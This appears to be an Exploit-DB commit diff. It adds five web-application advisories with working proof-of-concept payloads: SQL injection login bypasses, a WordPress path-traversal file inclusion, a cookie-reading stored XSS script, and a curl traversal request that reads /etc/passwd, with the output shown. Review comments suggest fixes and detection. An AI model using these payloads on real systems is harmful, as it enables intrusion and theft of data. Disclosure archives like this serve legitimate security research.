DB: 2021-12-04
5 changes to exploits/shellcodes Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass Online Magazine Management System 1.0 - SQLi Authentication Bypass WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI) WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated) WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)
parent
1abdd81300
commit
34c9d56d78
6 changed files with 175 additions and 0 deletions
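--- /dev/null
+++ b/exploits/php/webapps/50560.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass
+# Date: 01-12-2021
+# Exploit Author: Mohamed habib Smidi (Craniums)
+# Vendor Homepage: https://www.sourcecodester.com/php/15067/online-pre-ownedused-car-showroom-management-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/used_car_showroom.zip
+# Version: 1.0
+# Tested on: Ubuntu
+
+# Description :
+
+Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form.
+
+# Request :
+
+POST /used_car_showroom/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0)
+Gecko/20100101 Firefox/93.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 49
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/used_car_showroom/admin/login.php
+Cookie: PHPSESSID=v0h6049m9ppunsh8vtfc8oj4p5
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+
+username='+or+1%3D1+limit+1+--+-%2B&password=aaaa
+
+--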
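Review bot: The advisory identifies neither the vulnerable code nor a remediation, only the request that demonstrates the bypass; a line such as `# Vulnerable file: classes/Login.php (login query presumably built from the username field — confirm against source)` plus `# Fix: use a prepared statement for the login lookup` would let readers verify and patch it. The same gap exists in 50561.txt, which is the same template against `/magazines/classes/Login.php`. The captured request also carries a session cookie and browser headers (`Cookie`, `DNT`, `Sec-Fetch-*`) that play no part in the reproduction, so trimming it to the request line, `Host`, `Content-Type` and body would make the PoC clearer. The `# Date: 01-12-2021` format is ambiguous between day-first and month-first; the ISO form `2021-12-01` matches the commit date. The trailing `--` on the last line looks like a leftover and can be dropped.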
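--- /dev/null
+++ b/exploits/php/webapps/50561.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Online Magazine Management System 1.0 - SQLi Authentication Bypass
+# Date: 01-12-2021
+# Exploit Author: Mohamed habib Smidi (Craniums)
+# Vendor Homepage: https://www.sourcecodester.com/php/15061/online-magazine-management-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/magazines_0.zip
+# Version: 1.0
+# Tested on: Ubuntu
+
+
+# Description :
+
+Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form.
+
+# Request :
+
+POST /magazines/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0)
+Gecko/20100101 Firefox/93.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 49
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/magazines/admin/login.php
+Cookie: PHPSESSID=863plvf7rpambpkmk2cipijgra
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+
+username='+or+1%3D1+limit+1+--+-%2B&password=aaaa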
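--- /dev/null
+++ b/exploits/php/webapps/50562.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)
+# Exploit Author: Mohamed Magdy Abumusilm Aka m19o
+# Software: All-in-One Video Gallery plugin
+# Version: <= 2.4.9
+# Tested on: Windows,linux
+
+Poc: https://example.com/wordpress/wp-admin/admin.php?page=all-in-one-video-gallery&tab=../../../../../poc
+
+Decription : Authenticated user can exploit LFI vulnerability in tab parameter.
+
+Vulnerable code block : https://i.ibb.co/hXRcSQp/1123.png
+
+You can find a writeup at my blog : https://m19o.github.io/posts/How-i-found-my-first-0day/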
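Review bot: The header omits the `# Date:`, `# Vendor Homepage:` and `# Software Link:` fields that every other advisory in this commit carries, and `Decription` is misspelled. The only pointer to the vulnerable code is a screenshot (`https://i.ibb.co/hXRcSQp/1123.png`), which cannot be searched or diffed; replacing it with `Vulnerable code: [plugin file and line where the tab parameter reaches a file include — from the plugin source]` would be durable. "Authenticated user" does not say which WordPress role can reach the `all-in-one-video-gallery` admin page, and that determines severity, so a `# Required privilege:` line is worth adding. A `Mitigation:` line stating the fixed plugin version, or that `tab` must be matched against a fixed allow-list of tab names, would make the file actionable for site owners.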
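--- /dev/null
+++ b/exploits/php/webapps/50563.txt
@@ -0,0 +1,19 @@
+# Exploit Title: WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)
+# Date: 02/12/2021
+# Exploit Author: Abdurrahman Erkan (@erknabd)
+# Vendor Homepage: https://soliloquywp.com/
+# Software Link: https://wordpress.org/plugins/soliloquy-lite/
+# Version: 2.6.2
+# Tested on: Kali Linux 2021 - Firefox 78.7, Windows 10 - Brave 1.32.113, WordPress 5.8.2
+
+# Proof of Concept:
+#
+# 1- Install and activate the Slider by Soliloquy 2.6.2 plugin.
+# 2- Open Soliloquy and use "Add New" button to add new post.
+# 3- Add payload to title. Payload: <script>alert(document.cookie)</script>
+# 4- Add any image in post.
+# 5- Publish the post.
+# 6- XSS has been triggered.
+#
+# Go to this url "http://localhost/wp-admin/post.php?post=1&action=edit" XSS will trigger. - For wordpress users.
+# Go to this url "http://localhost/?post_type=soliloquy&p=1" XSS will trigger. - For normal users.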
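Review bot: The advisory says the XSS is authenticated but not which WordPress role is needed to create a Soliloquy slider, and that is the fact a site owner needs to judge exposure, since a role that already holds `unfiltered_html` makes a stored script in a post title expected WordPress behaviour rather than a plugin bug. A line such as `# Required privilege: [lowest role that can add a slider — confirm]` would settle this. The file also names no fixed version and no vendor notification date, so `# Fixed in: [version from the plugin changelog]` is missing. Steps 1 through 6 and the two URLs are clear; the `post=1` / `p=1` ids are presumably the id of the slider created in step 2, which the note could say explicitly.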
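--- /dev/null
+++ b/exploits/php/webapps/50564.txt
@@ -0,0 +1,66 @@
+# Exploit Title: WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)
+# Google Dork: inurl:/wp-content/plugins/dzs-zoomsounds/
+# Date: 2/12/2021
+# Exploit Author: Uriel Yochpaz
+# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
+# Software Link:
+# Version: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
+# Tested on: Linux (DZS Zoomsounds version 5.82)
+# CVE : CVE-2021-39316
+
+The vulnerability allows a remote attacker to perform directory traversal attacks.
+The vulnerability exists due to input validation error when processing directory traversal sequences in the "link" parameter in the "dzsap_download" action. A remote attacker can send a specially crafted HTTP request and read arbitrary files on the system.
+
+Mitigation:
+Install update from vendor's website.
+
+Vulnerable software versions ZoomSounds:
+1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30,
+2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10,
+3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03,
+5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
+
+PoC:
+user@ubuntu:~$ curl "http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd"
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+syslog:x:104:108::/home/syslog:/bin/false
+_apt:x:105:65534::/nonexistent:/bin/false
+messagebus:x:106:110::/var/run/dbus:/bin/false
+uuidd:x:107:111::/run/uuidd:/bin/false
+lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
+whoopsie:x:109:117::/nonexistent:/bin/false
+avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
+avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
+dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
+colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
+speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
+hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
+kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
+pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
+rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
+saned:x:119:127::/var/lib/saned:/bin/false
+usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
+user:x:1000:1000:user,,,:/home/user:/bin/bash
+mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false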
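Review bot: The title says 6.45, `# Tested on:` says 5.82 and `# Version:` lists 79 releases, so the file never states which version the PoC was actually run against beyond 5.82, and the same 79-entry list is then repeated verbatim under "Vulnerable software versions ZoomSounds". `# Software Link:` is empty. The mitigation line "Install update from vendor's website" names no fixed release; `Mitigation: upgrade to [fixed version — from the vendor advisory for CVE-2021-39316] or later` would be actionable, and a detection hint such as `Detection: web-server log entries for action=dzsap_download whose link parameter contains ../ sequences` would help defenders who cannot patch immediately. The 41 pasted lines of `/etc/passwd` add nothing after the first two or three; trimming them keeps the PoC readable.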
|
@ -44646,5 +44646,10 @@ id,file,description,date,author,type,platform,port
|
|||
50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
|
||||
50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,
|
||||
50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
|
||||
50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
|
||||
50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
|
||||
50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,
|
||||
50561,exploits/php/webapps/50561.txt,"Online Magazine Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
|
||||
50562,exploits/php/webapps/50562.txt,"WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)",1970-01-01,"Mohamed Magdy Abumusilm",webapps,php,
|
||||
50563,exploits/php/webapps/50563.txt,"WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Abdurrahman Erkan",webapps,php,
|
||||
50564,exploits/php/webapps/50564.txt,"WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Uriel Yochpaz",webapps,php,
|
||||